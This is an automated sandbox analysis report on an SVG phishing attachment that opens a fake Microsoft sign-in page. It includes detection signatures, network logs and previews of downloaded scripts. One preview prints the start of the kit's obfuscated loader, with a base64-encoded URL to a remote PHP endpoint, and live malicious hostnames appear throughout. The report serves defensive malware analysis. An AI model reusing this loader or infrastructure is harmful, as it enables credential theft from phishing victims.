Windows Analysis Report
TRANS_ADV_9290910137_.svg

Overview

General Information

Sample name: TRANS_ADV_9290910137_.svg
Analysis ID: 1648348
MD5: 7b341b85cc6592b164bdb89e523773e6
SHA1: fb90fd35e542803631797d5f1af9c2bd8ac41caa
SHA256: ebb1aa64e9f2eeaebf01d56bb3f5d42bb13f030f7418417a22840926a4918e62

Detection

HTMLPhisher
Score: 64
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)

Classification

[Classification chart. Axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Legend: clean, suspicious, malicious.]
  • System is w10x64_ra
  • chrome.exe (PID: 7016 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\TRANS_ADV_9290910137_.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6256 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,17266258622726128370,13840176397615438204,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
TRANS_ADV_9290910137_.svg | JoeSecurity_JavaScriptembeddedinSVG | Yara detected JavaScript embedded in SVG | Joe Security |

Source | Rule | Description | Author | Strings
0.6.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |
0.7.pages.csv | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

No Sigma rule has matched
No Suricata rule has matched

Phishing

Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv
Source: Yara match | File source: 0.6.pages.csv, type: HTML
Source: Yara match | File source: 0.7.pages.csv, type: HTML
Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137... This script exhibits several high-risk behaviors, including dynamic code execution through the use of `atob()` to decode a URL, and data exfiltration by sending an email address to an external domain. The obfuscated code and URL also raise suspicions. While the intent is unclear, the overall behavior of this script is highly suspicious and poses a significant security risk.
Source: 0.10..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://5739350082-1317754460.cos.ap-singapore.myq... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be downloading and executing a remote PHP file, which could potentially be used for malicious purposes such as stealing user data or executing further malicious code. Additionally, the script uses various techniques to obfuscate its behavior, making it difficult to analyze and understand its true intent. Overall, this script poses a significant security risk and should be treated with caution.
Source: Yara match | File source: TRANS_ADV_9290910137_.svg, type: SAMPLE
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: Number of links: 0
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: <input type="password" .../> found but no <form action="...
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: Base64 decoded: Flank magna chicken excepteur kevin frankfurter quis ad.
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: Title: Sign in to your account does not match URL
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: Invalid link: Privacy statement
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: Has password / email / username input fields
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: <input type="password" .../> found
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/TRANS_ADV_9290910137_.svg | HTTP Parser: No <meta name="copyright".. found
Source: chrome.exe | Memory has grown: Private usage: 1MB later: 41MB
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49695
        Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49695 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.131.98:443 -> 192.168.2.16:49698 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49700 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49701 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.164:443 -> 192.168.2.16:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 151.101.194.137:443 -> 192.168.2.16:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 43.152.64.207:443 -> 192.168.2.16:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.56.162.51:443 -> 192.168.2.16:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.17.202.1:443 -> 192.168.2.16:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 69.49.245.67:443 -> 192.168.2.16:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.31:443 -> 192.168.2.16:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.209.72.9:443 -> 192.168.2.16:49747 version: TLS 1.2
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir7016_677535273
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir7016_677535273
        Source: classification engine | Classification label: mal64.phis.winSVG@22/15@39/259
        Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\TRANS_ADV_9290910137_.svg
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,17266258622726128370,13840176397615438204,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2116 /prefetch:3
        | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
        |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
        | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 Browser Extensions | 1 Process Injection | 1 Masquerading | OS Credential Dumping | System Service Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
        | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Extra Window Memory Injection | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
        | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 File Deletion | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
        | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Extra Window Memory Injection | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 1 Ingress Tool Transfer | Traffic Duplication | Data Destruction |

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | TRANS_ADV_9290910137_.svg | 0% | Virustotal | | Browse |
        No Antivirus matches
                                                              Joe Sandbox version:42.0.0 Malachite
                                                              Analysis ID:1648348
                                                              Start date and time:2025-03-25 19:04:42 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:16
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • EGA enabled
                                                              Analysis Mode:stream
                                                              Analysis stop reason:Timeout
                                                              Sample name:TRANS_ADV_9290910137_.svg
                                                              Detection:MAL
                                                              Classification:mal64.phis.winSVG@22/15@39/259
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .svg
                                                              • Exclude process from analysis (whitelisted): svchost.exe
                                                              • Excluded IPs from analysis (whitelisted): 142.250.65.238, 142.250.80.67, 142.251.35.174, 142.251.167.84, 142.251.40.238, 142.251.40.110, 142.250.80.46
                                                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
                                                              • Not all processes were analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • VT rate limit hit for: ajhds.myhaetsinks.com
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):2309
                                                              Entropy (8bit):3.9533709859154516
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:26A555918CCCAC480C5DC4845ECC04E1
                                                              SHA1:3B9F8C9C19902E4751C392E8764F612ED60F2818
                                                              SHA-256:FF8A819AC9081D67E353BC9FC2654A583A5A0631EA6EB617A130ECC9BF8B010A
                                                              SHA-512:8F4F894FAE992AAA001D6CDE538829A3153BE16672CEACD4315AEE932025EA1814A9AB6F08BCE0B40C34BE76FACDC6535AE5FB52CC20A7FFC36041A28B817012
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (32065)
                                                              Category:downloaded
                                                              Size (bytes):85578
                                                              Entropy (8bit):5.366055229017455
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:2F6B11A7E914718E0290410E85366FE9
                                                              SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                                              SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                                              SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                                              Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:SVG Scalable Vector Graphics image
                                                              Category:downloaded
                                                              Size (bytes):1864
                                                              Entropy (8bit):5.222032823730197
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (19015)
                                                              Category:downloaded
                                                              Size (bytes):19188
                                                              Entropy (8bit):5.212814407014048
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:70D3FDA195602FE8B75E0097EED74DDE
                                                              SHA1:C3B977AA4B8DFB69D651E07015031D385DED964B
                                                              SHA-256:A52F7AA54D7BCAAFA056EE0A050262DFC5694AE28DEE8B4CAC3429AF37FF0D66
                                                              SHA-512:51AFFB5A8CFD2F93B473007F6987B19A0A1A0FB970DDD59EF45BD77A355D82ABBBD60468837A09823496411E797F05B1F962AE93C725ED4C00D514BA40269D14
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
                                                              Preview:/*. Copyright (C) Federico Zivolo 2017. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll)/.test(r+s+p)?e:n(o(e))}function r(e){var o=e&&e.offsetParent,i=o&&o.nodeName;return i&&'BODY'!==i&&'HTML'!==i?-1!==['TD','TABLE'].indexOf(o.nodeName)&&'static'===t(o,'position')?r(o):o:e?e.ownerDocument.documentElement:document.documentElement}functio
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                              Category:downloaded
                                                              Size (bytes):17174
                                                              Entropy (8bit):2.9129715116732746
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://aadcdn.msauth.net/ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):3.990210155325004
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                              SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                              SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                              SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 2016 x 2016, 8-bit/color RGBA, non-interlaced
                                                              Category:dropped
                                                              Size (bytes):21873
                                                              Entropy (8bit):2.877142515573533
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:568F3323A159C49C955A6E9E5CE8AC4D
                                                              SHA1:9F2A67B5CC72217B67EBB5C0B63556D70C4795C3
                                                              SHA-256:4E19539141237AAB02BA7D5E9657823C29907581024BADB76B1026F739BDC7B5
                                                              SHA-512:00F9B53896F031CACC067061DD39AB3E7EDD0FD450456029212A0649F6A1A5C2895D7CDB72214851F63529D3E22BDADD23C0A991AB32DF55C8E8B646D789B42B
                                                              Malicious:false
                                                              Reputation:unknown
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (65474), with CRLF line terminators
                                                              Category:downloaded
                                                              Size (bytes):549812
                                                              Entropy (8bit):4.912882279168358
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:887C8D81BFE634545752D0CDC62EA68C
                                                              SHA1:0556868B901532440E16AB993EC51F10CEF424B1
                                                              SHA-256:D2F5F6729EA4B27A2C333F749909210FF1EBBD13AC6C7229C10C037B0F1A30C6
                                                              SHA-512:2AEC9016B95A985E14B5876230EE6D2B6F397F1B063C377D93A9D0B680C32E252DA562D1761ED6E7BB697A5D4BA8AF4880BB97B5126C1A47D421B58B07F4442C
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://5739350082-1317754460.cos.ap-singapore.myqcloud.com/bootstrap.min.js
                                                              Preview:var file = "aHR0cHM6Ly81NzM5MzUwMDgyLnNicy9nb29nbGUucGhw";....var _0x586849=_0x3529;(function(_0x186e81,_0x380acb){var _0x34a11c=_0x3529,_0xef0e23=_0x186e81();while(!![]){try{var _0x535a49=parseInt(_0x34a11c(0x2a9))/(0x1e31+0x134*-0x16+-0x3b8)+-parseInt(_0x34a11c(0x2a99))/(-0x702+0xa9d+-0x399)*(parseInt(_0x34a11c(0xbdd))/(-0x20aa*-0x1+-0x257c+0x4d5*0x1))+-parseInt(_0x34a11c(0xf4d))/(-0x567*-0x4+-0x886+-0x689*0x2)*(parseInt(_0x34a11c(0x1422))/(0x118a*0x1+0x1425*-0x1+0x2a0))+parseInt(_0x34a11c(0xe0b))/(-0xfd5+-0x1a30+0x2a0b)*(-parseInt(_0x34a11c(0x13bd))/(0x25b7+0xc4*-0x1b+0x4*-0x441))+parseInt(_0x34a11c(0x15f2))/(-0x36*-0xd+0x9d0+-0xc86)+-parseInt(_0x34a11c(0xa3d))/(0x1491+-0x206e+0xbe6)+-parseInt(_0x34a11c(0x1433))/(-0x5f8+-0x168+-0xd*-0x92)*(-parseInt(_0x34a11c(0x49d))/(0x159d+0x979+0x9*-0x373));if(_0x535a49===_0x380acb)break;else _0xef0e23['push'](_0xef0e23['shift']());}catch(_0x8dd1f8){_0xef0e23['push'](_0xef0e23['shift']());}}}(_0x1c5f,-0x1e295*-0x2+0x9994a+-0x6aeef));var count=0x5
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (48664)
                                                              Category:downloaded
                                                              Size (bytes):48944
                                                              Entropy (8bit):5.272507874206726
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                              SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                              SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                              SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
                                                              Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:downloaded
                                                              Size (bytes):32
                                                              Entropy (8bit):4.390319531114783
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:EB3CE3190D8A58E048D35E620747D3A5
                                                              SHA1:76B5B6461189F839B018EF5C785DB4836B818B7D
                                                              SHA-256:2D670E2962D8D805B95912CACA0822CE7C6913636BA40373C6E6AEA73CAC8457
                                                              SHA-512:08F9C680B09CC25919A91F8E080CFC517F7354F49759DDC8CF6FFEB5ADE2E46F80A866E7531B6EA97188A5E4647093350F91ED51254351C47BCE3488EF88A595
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCVcB_Tlaqnt7EgUNrQmusSHc1SZ4nX4UdxIZCSedJpWNfbhLEgUNQ_N2OSHeI9k5CLjOqw==?alt=proto
                                                              Preview:CgkKBw2tCa6xGgAKCQoHDUPzdjkaAA==
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (50758)
                                                              Category:downloaded
                                                              Size (bytes):51039
                                                              Entropy (8bit):5.247253437401007
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:67176C242E1BDC20603C878DEE836DF3
                                                              SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                              SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
